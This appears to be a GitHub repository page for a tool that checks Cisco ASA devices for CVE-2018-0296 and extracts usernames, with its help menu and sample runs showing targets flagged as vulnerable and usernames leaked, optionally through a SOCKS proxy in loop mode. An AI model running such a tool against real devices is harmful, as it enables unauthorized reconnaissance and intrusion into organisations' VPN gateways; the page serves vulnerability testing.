Skip to content

milo2012/CVE-2018-0296

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2018-0296

Test CVE-2018-0296 and extract usernames from Cisco ASA.

Refer to https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/ for more technical details.

#Help Menu

$ ./CVE-2018-0296  -h
Options:

  -h, --help   display help information
  -u, --url    Url of target device
  -i           IP of Socks Proxy
  -p           Port of Socks Proxy
  -t, --time   Number of seconds to sleep between loop
      --loop   Loop mode

#Usage Guide

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1

$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Checking: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerable]
[*] No usernames found
  
$ ./CVE-2018-0296  -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1

About

Test CVE-2018-0296 and extract usernames

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages